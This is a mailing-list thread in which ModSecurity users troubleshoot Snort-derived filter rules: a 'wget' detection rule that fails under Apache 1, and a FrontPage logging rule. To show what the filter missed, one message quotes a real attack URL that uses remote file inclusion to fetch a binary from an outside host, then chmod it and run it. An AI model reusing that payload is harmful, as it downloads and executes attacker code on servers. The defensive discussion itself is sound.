mod-security-users

[mod-security-users] Problem with snort rules

[Danny S. <dsh...@al...>]

I am working on getting my filters configured for a number of webservers.  I
used a few filters I found in the snort filters that were converted.
However, upon further investigation, it didn't yield what I was looking for.
Here is the one I think should be tripped:

# WEB-ATTACKS wget command attempt
SecFilter "wget\x20"

Here is a real url (slightly modified) that was used to attack a server.


http://someplace.com?basepath=http://www.wsar.hpg.ig.com.br/dcphp3.gif?&
cmd=cd%20/tmp;wget%20http://hac10.tripod.com.br/cgi;chmod%20711%20cgi;./cgi



 I would have expected the wget filter above to block it.  Can anyone help
me understand why the filter above doesn't block wget?  Am I missing the
point?  Please be gentle.  Thanks.

Re: [mod-security-users] Problem with snort rules

[Ivan R. <iv...@we...>]

Danny Shurett wrote:
> I am working on getting my filters configured for a number of webservers.  I
> used a few filters I found in the snort filters that were converted.
> However, upon further investigation, it didn't yield what I was looking for.
> Here is the one I think should be tripped:
> 
> # WEB-ATTACKS wget command attempt
> SecFilter "wget\x20"

  It seems that the filter works fine in Apache 2, but not in Apache 1.
  The problem is with the escaping syntax; if you replace "\x20" with
  a simple space it works fine.

  Behaviors are probably different because two servers use two
  different regex engines (Apache 1 using something called hsregex,
  and Apache 2 using http://www.pcre.org).

  However, looking at the Apache web site, the \xHH syntax should work
  with Apache 1.x too. I'll try to find some documentation on the
  subject, or, if I fail, try to work around the problem in
  mod_security.

  Thanks for your email.

-- 
ModSecurity (http://www.modsecurity.org)
[ Open source IDS for Web applications ]

[mod-security-users] More problems with snort rules.

[Danny S. <dsh...@al...>]

I have this rule

SecFilterSelective THE_REQUEST "/_vti_bin/_vti_aut/author\.exe" log,pass

That I am trying to push frontpage through.  However, it is neither logging,
nor passing the request.

Re: [mod-security-users] More problems with snort rules.

[Ivan R. <iv...@we...>]

> SecFilterSelective THE_REQUEST "/_vti_bin/_vti_aut/author\.exe" log,pass
> 
> That I am trying to push frontpage through.  However, it is neither logging,
> nor passing the request.

  It works for me.

  Perhaps you have another rule that blocks the request first. You
  can see these things in the debug log. Also, are you looking for
  a message in the error log?

-- 
ModSecurity (http://www.modsecurity.org)
[ Open source IDS for Web applications ]